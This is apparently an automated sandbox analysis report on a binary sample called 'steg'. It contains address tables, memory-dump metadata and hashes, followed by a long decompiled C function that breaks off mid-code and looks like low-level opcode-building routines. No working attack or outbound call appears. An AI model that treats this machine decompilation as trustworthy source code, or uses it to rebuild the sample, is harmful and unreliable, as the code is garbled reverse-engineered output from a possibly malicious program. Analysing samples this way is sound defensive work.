                                                                                                                    0x00fa2d6c
                                                                                                                    0x00fa2d78
                                                                                                                    0x00fa2d78
                                                                                                                    0x00000000
                                                                                                                    0x00fa2d6c
                                                                                                                    0x00fa2d08
                                                                                                                    0x00fa2d0a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fa2d0c
                                                                                                                    0x00000000
                                                                                                                    0x00fa2c75
                                                                                                                    0x00fa2c75
                                                                                                                    0x00fa2c77
                                                                                                                    0x00fa2c81
                                                                                                                    0x00fa2c85
                                                                                                                    0x00fa2c8a
                                                                                                                    0x00fa2c8c
                                                                                                                    0x00fa2c8f
                                                                                                                    0x00fa2c91
                                                                                                                    0x00fa2cab
                                                                                                                    0x00fa2cad
                                                                                                                    0x00fa2cb3
                                                                                                                    0x00fa2cb3
                                                                                                                    0x00fa2cb6
                                                                                                                    0x00fa2cbd
                                                                                                                    0x00fa2cbd
                                                                                                                    0x00fa2cc3
                                                                                                                    0x00fa2ccb
                                                                                                                    0x00fa2cd0
                                                                                                                    0x00fa2cd3
                                                                                                                    0x00000000
                                                                                                                    0x00fa2cd3
                                                                                                                    0x00fa2c93
                                                                                                                    0x00fa2c95
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fa2c99
                                                                                                                    0x00fa2ca2
                                                                                                                    0x00000000
                                                                                                                    0x00fa2ca2
                                                                                                                    0x00fa2c73
                                                                                                                    0x00fa2aee
                                                                                                                    0x00fa2af1
                                                                                                                    0x00fa2af3
                                                                                                                    0x00fa2afd
                                                                                                                    0x00fa2afd
                                                                                                                    0x00fa2aff
                                                                                                                    0x00fa2b05
                                                                                                                    0x00fa2af5
                                                                                                                    0x00fa2af5
                                                                                                                    0x00fa2af8
                                                                                                                    0x00fa2af8
                                                                                                                    0x00fa2b10
                                                                                                                    0x00fa2b41
                                                                                                                    0x00fa2b48
                                                                                                                    0x00fa2b4f
                                                                                                                    0x00fa2b58
                                                                                                                    0x00fa2b5f
                                                                                                                    0x00fa2b6a
                                                                                                                    0x00fa2b6d
                                                                                                                    0x00000000
                                                                                                                    0x00fa2b6d
                                                                                                                    0x00fa2803
                                                                                                                    0x00fa2806
                                                                                                                    0x00fa280c
                                                                                                                    0x00fa280e
                                                                                                                    0x00fa2817
                                                                                                                    0x00fa281d
                                                                                                                    0x00fa2822
                                                                                                                    0x00fa2825
                                                                                                                    0x00fa2830
                                                                                                                    0x00fa2833
                                                                                                                    0x00fa2838
                                                                                                                    0x00fa283a
                                                                                                                    0x00fa283d
                                                                                                                    0x00fa2842
                                                                                                                    0x00fa291d
                                                                                                                    0x00fa2920
                                                                                                                    0x00fa2926
                                                                                                                    0x00fa292f
                                                                                                                    0x00fa293e
                                                                                                                    0x00fa293e
                                                                                                                    0x00fa2941
                                                                                                                    0x00fa294a
                                                                                                                    0x00fa294d
                                                                                                                    0x00fa2954
                                                                                                                    0x00fa295a
                                                                                                                    0x00fa295f
                                                                                                                    0x00fa2963
                                                                                                                    0x00fa296b
                                                                                                                    0x00fa2973
                                                                                                                    0x00fa2977
                                                                                                                    0x00fa2977
                                                                                                                    0x00fa297d
                                                                                                                    0x00fa298c
                                                                                                                    0x00fa298f
                                                                                                                    0x00fa2995
                                                                                                                    0x00fa299c
                                                                                                                    0x00fa29a3
                                                                                                                    0x00fa29a8
                                                                                                                    0x00fa29ac
                                                                                                                    0x00fa29af
                                                                                                                    0x00fa29b6
                                                                                                                    0x00fa29bd
                                                                                                                    0x00fa29c1
                                                                                                                    0x00fa29c4
                                                                                                                    0x00fa29d5
                                                                                                                    0x00fa29d8
                                                                                                                    0x00fa29e1
                                                                                                                    0x00fa29e7
                                                                                                                    0x00fa29fd
                                                                                                                    0x00fa29fd
                                                                                                                    0x00fa2a00
                                                                                                                    0x00fa2a00
                                                                                                                    0x00fa2a00
                                                                                                                    0x00fa2a06
                                                                                                                    0x00fa2a09
                                                                                                                    0x00fa2a10
                                                                                                                    0x00fa2a17
                                                                                                                    0x00fa2a1d
                                                                                                                    0x00fa2a22
                                                                                                                    0x00fa2a26
                                                                                                                    0x00fa2a2e
                                                                                                                    0x00fa2a32
                                                                                                                    0x00fa2a3d
                                                                                                                    0x00fa2a45
                                                                                                                    0x00fa2a48
                                                                                                                    0x00fa2a4b
                                                                                                                    0x00fa2a54
                                                                                                                    0x00fa2aaf
                                                                                                                    0x00fa2aaf
                                                                                                                    0x00fa2ab5
                                                                                                                    0x00fa2ab8
                                                                                                                    0x00fa2abc
                                                                                                                    0x00fa2ac2
                                                                                                                    0x00fa2ac5
                                                                                                                    0x00fa2ace
                                                                                                                    0x00fa2ad4
                                                                                                                    0x00fa2ada
                                                                                                                    0x00fa2ada
                                                                                                                    0x00000000
                                                                                                                    0x00fa2ace
                                                                                                                    0x00fa2a62
                                                                                                                    0x00fa2a68
                                                                                                                    0x00fa2a6b
                                                                                                                    0x00fa2a6e
                                                                                                                    0x00fa2a77
                                                                                                                    0x00fa2a7a
                                                                                                                    0x00fa2a8f
                                                                                                                    0x00fa2a94
                                                                                                                    0x00fa2a97
                                                                                                                    0x00fa2a97
                                                                                                                    0x00fa2a9a
                                                                                                                    0x00fa2a9d
                                                                                                                    0x00fa2aa0
                                                                                                                    0x00fa2aa3
                                                                                                                    0x00fa2aa3
                                                                                                                    0x00fa2aa6
                                                                                                                    0x00fa2aac
                                                                                                                    0x00000000
                                                                                                                    0x00fa2aac
                                                                                                                    0x00fa29ea
                                                                                                                    0x00fa29ef
                                                                                                                    0x00fa29f4
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fa29f6
                                                                                                                    0x00000000
                                                                                                                    0x00fa29f6
                                                                                                                    0x00fa2980
                                                                                                                    0x00fa2985
                                                                                                                    0x00fa298a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fa298a
                                                                                                                    0x00fa2932
                                                                                                                    0x00fa2937
                                                                                                                    0x00fa293c
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fa2848
                                                                                                                    0x00fa2848
                                                                                                                    0x00fa2848
                                                                                                                    0x00fa284c
                                                                                                                    0x00fa2907
                                                                                                                    0x00fa2909
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fa2852
                                                                                                                    0x00fa2852
                                                                                                                    0x00fa2858
                                                                                                                    0x00fa285d
                                                                                                                    0x00fa2860
                                                                                                                    0x00000000
                                                                                                                    0x00fa2862
                                                                                                                    0x00000000
                                                                                                                    0x00fa2862
                                                                                                                    0x00fa2860
                                                                                                                    0x00fa287b
                                                                                                                    0x00fa2896
                                                                                                                    0x00fa2898
                                                                                                                    0x00fa289b
                                                                                                                    0x00fa289e
                                                                                                                    0x00fa2901
                                                                                                                    0x00fa2901
                                                                                                                    0x00fa2904
                                                                                                                    0x00000000
                                                                                                                    0x00fa2904
                                                                                                                    0x00fa28a0
                                                                                                                    0x00fa28a3
                                                                                                                    0x00fa28a9
                                                                                                                    0x00fa28ab
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fa28ad
                                                                                                                    0x00fa28b0
                                                                                                                    0x00fa28b3
                                                                                                                    0x00fa28b6
                                                                                                                    0x00fa28ce
                                                                                                                    0x00fa28ce
                                                                                                                    0x00fa28ce
                                                                                                                    0x00fa28ce
                                                                                                                    0x00fa28d1
                                                                                                                    0x00fa28d4
                                                                                                                    0x00fa28d7
                                                                                                                    0x00fa28de
                                                                                                                    0x00fa28e4
                                                                                                                    0x00fa28e9
                                                                                                                    0x00fa28ed
                                                                                                                    0x00fa28f5
                                                                                                                    0x00fa28fd
                                                                                                                    0x00000000
                                                                                                                    0x00fa28fd
                                                                                                                    0x00fa28b9
                                                                                                                    0x00fa28be
                                                                                                                    0x00fa28c1
                                                                                                                    0x00fa28c3
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fa28c5
                                                                                                                    0x00fa28cb
                                                                                                                    0x00000000
                                                                                                                    0x00fa28cb
                                                                                                                    0x00fa290b
                                                                                                                    0x00fa290c
                                                                                                                    0x00fa290f
                                                                                                                    0x00fa2917
                                                                                                                    0x00000000
                                                                                                                    0x00fa2917
                                                                                                                    0x00fa2797
                                                                                                                    0x00fa27a1
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: )$1$6$7$?$@$F$m$z${${7Fm
                                                                                                                    • API String ID: 0-3350488062
                                                                                                                    • Opcode ID: 0d273660a1ebd2e2c57f6c68f1276b474e3981ed57e80f0fe09ee6d4371a9faf
                                                                                                                    • Instruction ID: 79ba5f311977ee55556a9e9595956f8de2add4995532055b6722c4aae54eb9a8
                                                                                                                    • Opcode Fuzzy Hash: 0d273660a1ebd2e2c57f6c68f1276b474e3981ed57e80f0fe09ee6d4371a9faf
                                                                                                                    • Instruction Fuzzy Hash: 68A28FB0D002199FDB24DF98CC80FAEBBB1FF09314F148199E949AB252D735AA95DF50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00F9C2C7 Relevance: 12.3, APIs: 4, Strings: 2, Instructions: 1756COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 55%
                                                                                                                    			E00F9C2C7(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				char _v20;
				void* _v24;
				void* _v28;
				intOrPtr* _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _t1111;
				intOrPtr _t1112;
				signed int _t1113;
				void* _t1115;
				intOrPtr _t1119;
				intOrPtr _t1120;
				signed int _t1123;
				signed int _t1124;
				signed int _t1125;
				unsigned int _t1126;
				signed int _t1127;
				unsigned int _t1128;
				signed int _t1129;
				unsigned int _t1130;
				signed int _t1131;
				unsigned int _t1132;
				signed int _t1133;
				unsigned int _t1136;
				signed int _t1137;
				unsigned int _t1141;
				unsigned int _t1146;
				signed int _t1147;
				unsigned int _t1148;
				signed int _t1149;
				unsigned int _t1151;
				signed int _t1152;
				unsigned int _t1153;
				signed int _t1154;
				signed int _t1157;
				signed int _t1161;
				signed int _t1164;
				signed int _t1168;
				signed int _t1175;
				intOrPtr _t1178;
				intOrPtr _t1181;
				intOrPtr _t1186;
				signed int _t1187;
				signed int _t1188;
				signed int _t1192;
				unsigned int _t1195;
				signed int _t1196;
				unsigned int _t1198;
				signed int _t1199;
				unsigned int _t1200;
				unsigned int _t1207;
				signed int _t1208;
				unsigned int _t1209;
				intOrPtr _t1215;
				unsigned int _t1216;
				signed int _t1217;
				unsigned int _t1218;
				signed int _t1219;
				signed int _t1220;
				signed int _t1224;
				signed int _t1227;
				signed int _t1231;
				signed int _t1234;
				signed int _t1238;
				signed int _t1241;
				signed int _t1245;
				signed int _t1248;
				signed int _t1252;
				signed int _t1255;
				signed int _t1259;
				signed int _t1266;
				intOrPtr _t1269;
				intOrPtr _t1272;
				intOrPtr _t1277;
				signed int _t1278;
				signed int _t1279;
				signed int _t1283;
				signed int _t1286;
				signed int _t1290;
				char _t1296;
				signed int _t1299;
				signed int _t1301;
				signed int _t1305;
				char _t1311;
				signed int _t1314;
				signed int _t1316;
				signed int _t1320;
				signed int _t1323;
				signed int _t1327;
				signed int _t1330;
				signed int _t1334;
				signed int _t1337;
				signed int _t1341;
				signed int _t1348;
				unsigned int _t1349;
				unsigned int _t1354;
				signed int _t1361;
				signed int _t1365;
				signed int _t1368;
				signed int _t1372;
				signed int _t1376;
				signed int _t1380;
				unsigned int _t1383;
				signed int _t1384;
				unsigned int _t1385;
				signed int _t1393;
				signed int _t1397;
				signed int _t1400;
				signed int _t1404;
				void* _t1407;
				void* _t1408;
				intOrPtr _t1412;
				unsigned int _t1413;
				void* _t1420;
				void* _t1424;
				intOrPtr* _t1425;
				intOrPtr* _t1427;
				signed int _t1428;
				signed int _t1430;
				signed int _t1431;
				signed int _t1432;
				signed int _t1433;
				signed int _t1434;
				signed int _t1435;
				signed int _t1436;
				signed int _t1438;
				signed int _t1439;
				signed int _t1441;
				intOrPtr* _t1442;
				signed int _t1444;
				signed int _t1445;
				signed int _t1446;
				signed int _t1447;
				signed int _t1448;
				signed int _t1449;
				signed int _t1450;
				signed int _t1451;
				char* _t1452;
				signed int _t1454;
				signed int _t1455;
				signed int _t1456;
				intOrPtr _t1457;
				signed int _t1458;
				signed int _t1459;
				intOrPtr _t1460;
				signed int _t1461;
				signed int _t1463;
				signed int _t1464;
				signed int _t1465;
				signed int _t1469;
				signed int _t1473;
				signed int _t1474;
				signed int _t1475;
				signed int _t1476;
				intOrPtr _t1478;
				signed int _t1479;
				signed int _t1480;
				signed int _t1481;
				signed int _t1482;
				signed int _t1483;
				signed int _t1484;
				signed int _t1485;
				signed int _t1486;
				signed int _t1487;
				intOrPtr _t1488;
				short* _t1490;
				intOrPtr _t1491;
				signed int _t1492;
				signed int _t1493;
				intOrPtr _t1494;
				signed int _t1495;
				signed int _t1496;
				signed int _t1497;
				signed int _t1498;
				intOrPtr _t1499;
				signed int _t1500;
				intOrPtr _t1501;
				signed int _t1502;
				signed int _t1503;
				intOrPtr _t1504;
				signed int _t1505;
				signed int _t1506;
				intOrPtr _t1507;
				signed int _t1508;
				short* _t1510;
				signed int _t1511;
				short* _t1513;
				signed int _t1514;
				signed int _t1515;
				intOrPtr _t1517;
				intOrPtr _t1518;
				signed int _t1519;
				intOrPtr _t1520;
				signed int _t1521;
				intOrPtr _t1522;
				signed int _t1523;
				intOrPtr _t1524;
				signed int _t1525;
				intOrPtr _t1526;
				signed int _t1527;
				intOrPtr _t1528;
				signed int _t1529;
				intOrPtr _t1530;
				signed int _t1531;
				signed int _t1532;
				intOrPtr _t1533;
				signed int _t1534;
				intOrPtr _t1535;
				signed int _t1536;
				intOrPtr _t1537;
				signed int _t1538;
				intOrPtr _t1539;
				signed int _t1540;
				intOrPtr _t1541;
				signed int _t1542;
				intOrPtr _t1543;
				signed int _t1544;
				signed int _t1546;
				short* _t1548;
				short* _t1550;
				intOrPtr _t1551;
				signed int _t1552;
				intOrPtr _t1553;
				signed int _t1554;
				intOrPtr _t1555;
				signed int _t1556;
				signed int _t1557;
				short* _t1559;
				signed int _t1560;
				intOrPtr _t1561;
				signed int _t1562;
				intOrPtr _t1563;
				signed int _t1564;
				signed int _t1565;
				short* _t1567;
				short* _t1569;
				intOrPtr _t1574;
				intOrPtr _t1576;
				signed int _t1582;
				signed int _t1583;
				signed int _t1585;
				signed int _t1588;
				signed int _t1596;
				void* _t1603;
				signed int _t1608;
				signed int _t1611;
				intOrPtr _t1612;
				signed int _t1619;
				void* _t1634;
				signed int _t1661;
				unsigned int _t1662;
				void* _t1663;
				signed int _t1664;
				signed int _t1665;
				signed int _t1666;
				signed int _t1667;
				signed int _t1668;
				signed int _t1669;
				char* _t1670;
				signed int _t1672;
				signed int _t1674;
				signed int _t1675;
				signed int _t1676;
				signed int _t1677;
				signed int _t1678;
				signed int _t1679;
				signed int _t1680;
				intOrPtr* _t1681;
				signed int _t1684;
				char* _t1685;
				signed int _t1687;
				char* _t1689;
				signed int _t1691;
				signed int _t1693;
				signed int _t1694;
				signed int _t1695;
				signed int _t1696;
				signed int _t1697;
				signed int _t1698;
				signed int _t1701;
				signed int _t1702;
				intOrPtr _t1703;
				intOrPtr* _t1704;
				void* _t1705;
				void* _t1706;
				void* _t1707;
				void* _t1708;
				void* _t1709;
				void* _t1710;
				void* _t1711;

				_t1425 = _a4;
				_t1704 =  *((intOrPtr*)(_t1425 + 0xc));
				if(_t1704 != 0) {
					L3:
					_t1111 = _a8;
					if(_t1111 == 0 ||  *((intOrPtr*)(_t1111 + 0x14)) == 0) {
						L415:
						return _t1111;
					} else {
						_t1112 = E00FCF827( *_t1425,  *((intOrPtr*)(_t1111 + 0x48)));
						_t1659 = _a8;
						_v40 = _t1112;
						_t1113 = E00FB7797(_t1425, 0x1c,  *((intOrPtr*)(_a8 + 4)), 0,  *((intOrPtr*)( *((intOrPtr*)( *_t1425 + 8)) + (_t1112 + _t1112) * 8)));
						_t1706 = _t1705 + 0x1c;
						if(_t1113 != 0) {
							L414:
							return _t1113;
						}
						E00FD2377(_t1425, _v40,  *((intOrPtr*)(_t1659 + 0x18)), _t1113,  *((intOrPtr*)(_t1659 + 4)));
						_t1661 =  *(_t1425 + 0x44);
						_t1707 = _t1706 + 0x14;
						_t1113 = _t1661 + 1;
						 *(_t1425 + 0x44) = _t1113;
						_v16 = _t1661;
						_t1427 =  *((intOrPtr*)(_a8 + 0x14));
						_v32 = _t1427;
						if(_t1427 == 0) {
							goto L414;
						} else {
							goto L7;
						}
						do {
							L7:
							_t1115 = E00FC6E47(_a4, _t1427);
							_t1428 =  *(_t1427 + 4);
							_v12 = _t1428;
							E00FD6647(_t1704, 0xd, _t1661,  *((intOrPtr*)(_v32 + 0x14)), _v40, _t1115, 0xfffffff0);
							_t1708 = _t1707 + 0x24;
							_t1119 = _a16 + _t1428 * 2;
							_v8 = _t1119;
							_t33 = _t1119 + 4; // 0xf9c1a9
							_t1478 = _t33;
							_t1120 = _a4;
							_v56 = _t1478;
							if(_t1478 >  *((intOrPtr*)(_t1120 + 0x48))) {
								 *((intOrPtr*)(_t1120 + 0x48)) = _t1478;
							}
							_t1662 = 0;
							if(_t1428 < 0) {
								L15:
								_t1663 = 0;
								if(_t1428 <= 0) {
									L22:
									_t1479 =  *(_t1704 + 0x18);
									_v48 = _t1479;
									 *(_t1704 + 0x18) = _t1479 + 1;
									_t1122 =  *(_t1704 + 0x1c);
									if(_t1479 <  *(_t1704 + 0x1c)) {
										L38:
										_t1123 =  *(_t1704 + 0x20);
										if(_t1123 != 0) {
											 *((intOrPtr*)(_t1123 + _t1479 * 4)) = 0xffffffff;
										}
										_t1664 =  *(_t1704 + 0xc);
										_t1430 = (_t1428 | 0xffffffff) - _t1479;
										_v48 = _t1430;
										if( *(_t1704 + 0x10) > _t1664) {
											L42:
											_t1124 =  *(_t1704 + 0x14);
											 *(_t1704 + 0xc) =  *(_t1704 + 0xc) + 1;
											_t1480 = _t1664 + _t1664 * 4;
											 *((short*)(_t1124 + _t1480 * 4)) = 0x7a;
											 *((char*)(_t1124 + 3 + _t1480 * 4)) = 0;
											 *((intOrPtr*)(_t1124 + 4 + _t1480 * 4)) = _v16;
											 *((intOrPtr*)(_t1124 + 8 + _t1480 * 4)) = _t1430;
											 *((intOrPtr*)(_t1124 + 0xc + _t1480 * 4)) = 0;
											 *((intOrPtr*)(_t1124 + 0x10 + _t1480 * 4)) = 0;
											 *((char*)(_t1704 + 0x6e)) = 0;
											goto L43;
										} else {
											_t1408 = E00FA96F7(_t1704);
											_t1708 = _t1708 + 4;
											if(_t1408 != 0) {
												L43:
												_t1431 =  *(_t1704 + 0xc);
												_v52 = _t1431;
												if( *(_t1704 + 0x10) > _t1431) {
													L45:
													_t1125 =  *(_t1704 + 0x14);
													 *(_t1704 + 0xc) =  *(_t1704 + 0xc) + 1;
													_t1481 = _t1431 + _t1431 * 4;
													 *((short*)(_t1125 + _t1481 * 4)) = 0x2a;
													 *((char*)(_t1125 + 3 + _t1481 * 4)) = 0;
													 *((intOrPtr*)(_t1125 + 4 + _t1481 * 4)) = _a16;
													 *(_t1125 + 8 + _t1481 * 4) = 1;
													 *((intOrPtr*)(_t1125 + 0xc + _t1481 * 4)) = 0;
													 *((intOrPtr*)(_t1125 + 0x10 + _t1481 * 4)) = 0;
													 *((char*)(_t1704 + 0x6e)) = 0;
													L46:
													_t1574 = 0;
													_v20 = 0;
													if(_v12 <= 0) {
														L76:
														_t1432 =  *(_t1704 + 0xc);
														_t1126 =  *(_t1704 + 0x10);
														if(_t1126 > _t1432) {
															L87:
															_t1127 =  *(_t1704 + 0x14);
															 *(_t1704 + 0xc) =  *(_t1704 + 0xc) + 1;
															_t1482 = _t1432 + _t1432 * 4;
															 *((short*)(_t1127 + _t1482 * 4)) = 0x60;
															 *((char*)(_t1127 + 3 + _t1482 * 4)) = 0;
															 *((intOrPtr*)(_t1127 + 4 + _t1482 * 4)) = 0;
															 *((intOrPtr*)(_t1127 + 8 + _t1482 * 4)) = _v48;
															 *((intOrPtr*)(_t1127 + 0xc + _t1482 * 4)) = 0;
															 *((intOrPtr*)(_t1127 + 0x10 + _t1482 * 4)) = 0;
															 *((char*)(_t1704 + 0x6e)) = 0;
															L88:
															_t1576 = 0;
															_v20 = 0;
															if(_v12 <= 0) {
																L119:
																_t1483 =  *(_t1704 + 0x20);
																if(_t1483 != 0) {
																	 *(_t1483 - 4 + _v48 * 4) =  *(_t1704 + 0xc);
																}
																_t1433 =  *(_t1704 + 0xc);
																_t1128 =  *(_t1704 + 0x10);
																if(_t1128 > _t1433) {
																	L132:
																	_t1129 =  *(_t1704 + 0x14);
																	 *(_t1704 + 0xc) =  *(_t1704 + 0xc) + 1;
																	_t1484 = _t1433 + _t1433 * 4;
																	 *((intOrPtr*)(_t1129 + 4 + _t1484 * 4)) = _v16;
																	 *((short*)(_t1129 + _t1484 * 4)) = 0x6a;
																	 *((char*)(_t1129 + 3 + _t1484 * 4)) = 0;
																	 *((intOrPtr*)(_t1129 + 8 + _t1484 * 4)) = _v52;
																	 *((intOrPtr*)(_t1129 + 0xc + _t1484 * 4)) = 0;
																	 *((intOrPtr*)(_t1129 + 0x10 + _t1484 * 4)) = 0;
																	 *((char*)(_t1704 + 0x6e)) = 0;
																	goto L133;
																} else {
																	if(_t1128 == 0) {
																		_t1337 = 0x33;
																	} else {
																		_t1337 = _t1128 + _t1128;
																	}
																	_t1695 = E00FBE7D7( *_t1704,  *(_t1704 + 0x14), _t1337 + _t1337 * 4 << 2);
																	_t1708 = _t1708 + 0xc;
																	if(_t1695 == 0) {
																		L133:
																		_t1434 =  *(_t1704 + 0xc);
																		_t1130 =  *(_t1704 + 0x10);
																		if(_t1130 > _t1434) {
																			L144:
																			_t1131 =  *(_t1704 + 0x14);
																			 *(_t1704 + 0xc) =  *(_t1704 + 0xc) + 1;
																			_t1485 = _t1434 + _t1434 * 4;
																			 *((short*)(_t1131 + _t1485 * 4)) = 0x21;
																			 *((char*)(_t1131 + 3 + _t1485 * 4)) = 0;
																			 *((intOrPtr*)(_t1131 + 4 + _t1485 * 4)) = _v16;
																			 *((intOrPtr*)(_t1131 + 8 + _t1485 * 4)) = 0;
																			 *((intOrPtr*)(_t1131 + 0xc + _t1485 * 4)) = 0;
																			 *((intOrPtr*)(_t1131 + 0x10 + _t1485 * 4)) = 0;
																			 *((char*)(_t1704 + 0x6e)) = 0;
																			L145:
																			_t1435 =  *(_t1704 + 0xc);
																			_t1132 =  *(_t1704 + 0x10);
																			_v52 = _t1435;
																			if(_t1132 > _t1435) {
																				L156:
																				_t1133 =  *(_t1704 + 0x14);
																				 *(_t1704 + 0xc) =  *(_t1704 + 0xc) + 1;
																				_t1486 = _t1435 + _t1435 * 4;
																				 *((short*)(_t1133 + _t1486 * 4)) = 0x44;
																				 *((char*)(_t1133 + 3 + _t1486 * 4)) = 0;
																				 *((intOrPtr*)(_t1133 + 4 + _t1486 * 4)) = _a16;
																				 *((intOrPtr*)(_t1133 + 8 + _t1486 * 4)) = 0;
																				 *((intOrPtr*)(_t1133 + 0xc + _t1486 * 4)) = 0;
																				 *((intOrPtr*)(_t1133 + 0x10 + _t1486 * 4)) = 0;
																				 *((char*)(_t1704 + 0x6e)) = 0;
																				L157:
																				_t1665 =  *(_t1704 + 0xc);
																				_v20 =  *((intOrPtr*)(_a8 + 4));
																				_t1136 =  *(_t1704 + 0x10);
																				if(_t1136 > _t1665) {
																					L169:
																					_t1137 =  *(_t1704 + 0x14);
																					 *(_t1704 + 0xc) =  *(_t1704 + 0xc) + 1;
																					_t1487 = _t1665 + _t1665 * 4;
																					 *((short*)(_t1137 + _t1487 * 4)) = 0x5e;
																					 *((char*)(_t1137 + 3 + _t1487 * 4)) = 0;
																					 *((intOrPtr*)(_t1137 + 4 + _t1487 * 4)) = 0;
																					 *((intOrPtr*)(_t1137 + 8 + _t1487 * 4)) = _v8;
																					 *((intOrPtr*)(_t1137 + 0xc + _t1487 * 4)) = 0;
																					 *((intOrPtr*)(_t1137 + 0x10 + _t1487 * 4)) = 0;
																					 *((char*)(_t1704 + 0x6e)) = 0;
																					L170:
																					_t1582 =  *(_t1704 + 0x14);
																					_t1488 =  *_t1704;
																					if(_t1582 == 0 ||  *((char*)(_t1488 + 0x1e)) != 0) {
																						E00FA7BC7(_t1488, 0, _v20);
																						_t1709 = _t1708 + 0xc;
																						goto L184;
																					} else {
																						if(_t1665 < 0) {
																							_t1665 =  *(_t1704 + 0xc) - 1;
																						}
																						_t1459 = _t1582 + (_t1665 + _t1665 * 4) * 4;
																						_v48 = _t1459;
																						E00FA7BC7(_t1488,  *((char*)(_t1459 + 1)),  *((intOrPtr*)(_t1582 + 0x10 + (_t1665 + _t1665 * 4) * 4)));
																						_t1311 = _v20;
																						_t1709 = _t1708 + 0xc;
																						 *((intOrPtr*)(_t1459 + 0x10)) = 0;
																						if(_t1311 != 0) {
																							_t1689 = _t1311;
																							if( *_t1311 == 0) {
																								L180:
																								_t1691 = _t1689 - _t1311 & 0x3fffffff;
																								_t1460 = E00FBE727( *_t1704, _t1691 + 1);
																								_t1709 = _t1709 + 8;
																								if(_t1460 != 0) {
																									E00FE7337(_t1460, _v20, _t1691);
																									_t1709 = _t1709 + 0xc;
																									 *((char*)(_t1460 + _t1691)) = 0;
																								}
																								_t1314 = _v48;
																								 *((intOrPtr*)(_t1314 + 0x10)) = _t1460;
																								 *((char*)(_t1314 + 1)) = 0xff;
																								goto L184;
																							}
																							do {
																								_t1689 = _t1689 + 1;
																							} while ( *_t1689 != 0);
																							goto L180;
																						} else {
																							 *((intOrPtr*)(_t1459 + 0x10)) = _t1311;
																							 *((char*)(_t1459 + 1)) = _t1311;
																							L184:
																							_t1666 =  *(_t1704 + 0xc);
																							_v20 =  *_v32;
																							_t1141 =  *(_t1704 + 0x10);
																							if(_t1141 > _t1666) {
																								L195:
																								 *(_t1704 + 0xc) =  *(_t1704 + 0xc) + 1;
																								_t1490 =  *(_t1704 + 0x14) + (_t1666 + _t1666 * 4) * 4;
																								 *_t1490 = 0x5e;
																								 *((char*)(_t1490 + 3)) = 0;
																								 *((intOrPtr*)(_t1490 + 4)) = 0;
																								 *((intOrPtr*)(_t1490 + 8)) = _v8 + 1;
																								 *((intOrPtr*)(_t1490 + 0xc)) = 0;
																								 *((intOrPtr*)(_t1490 + 0x10)) = 0;
																								 *((char*)(_t1704 + 0x6e)) = 0;
																								L196:
																								_t1583 =  *(_t1704 + 0x14);
																								_t1491 =  *_t1704;
																								if(_t1583 == 0 ||  *((char*)(_t1491 + 0x1e)) != 0) {
																									E00FA7BC7(_t1491, 0, _v20);
																									_t1710 = _t1709 + 0xc;
																									goto L209;
																								} else {
																									if(_t1666 < 0) {
																										_t1666 =  *(_t1704 + 0xc) - 1;
																									}
																									_t1456 = _t1583 + (_t1666 + _t1666 * 4) * 4;
																									_v48 = _t1456;
																									E00FA7BC7(_t1491,  *((char*)(_t1456 + 1)),  *((intOrPtr*)(_t1583 + 0x10 + (_t1666 + _t1666 * 4) * 4)));
																									_t1296 = _v20;
																									_t1710 = _t1709 + 0xc;
																									 *((intOrPtr*)(_t1456 + 0x10)) = 0;
																									if(_t1296 != 0) {
																										_t1685 = _t1296;
																										if( *_t1296 == 0) {
																											L205:
																											_t1687 = _t1685 - _t1296 & 0x3fffffff;
																											_t1457 = E00FBE727( *_t1704, _t1687 + 1);
																											_t1710 = _t1710 + 8;
																											if(_t1457 != 0) {
																												E00FE7337(_t1457, _v20, _t1687);
																												_t1710 = _t1710 + 0xc;
																												 *((char*)(_t1457 + _t1687)) = 0;
																											}
																											_t1299 = _v48;
																											 *((intOrPtr*)(_t1299 + 0x10)) = _t1457;
																											 *((char*)(_t1299 + 1)) = 0xff;
																											goto L209;
																										} else {
																											goto L204;
																										}
																										do {
																											L204:
																											_t1685 = _t1685 + 1;
																										} while ( *_t1685 != 0);
																										goto L205;
																									} else {
																										 *((intOrPtr*)(_t1456 + 0x10)) = _t1296;
																										 *((char*)(_t1456 + 1)) = _t1296;
																										L209:
																										_t1436 =  *(_t1704 + 0xc);
																										_t1146 =  *(_t1704 + 0x10);
																										_t1585 = _v8 + 2;
																										_v36 = _t1585;
																										if(_t1146 > _t1436) {
																											L220:
																											_t1147 =  *(_t1704 + 0x14);
																											 *(_t1704 + 0xc) =  *(_t1704 + 0xc) + 1;
																											_t1492 = _t1436 + _t1436 * 4;
																											 *((short*)(_t1147 + _t1492 * 4)) = 9;
																											 *((char*)(_t1147 + 3 + _t1492 * 4)) = 0;
																											 *((intOrPtr*)(_t1147 + 4 + _t1492 * 4)) = _a16;
																											 *((intOrPtr*)(_t1147 + 8 + _t1492 * 4)) = _t1585;
																											 *((intOrPtr*)(_t1147 + 0xc + _t1492 * 4)) = 0;
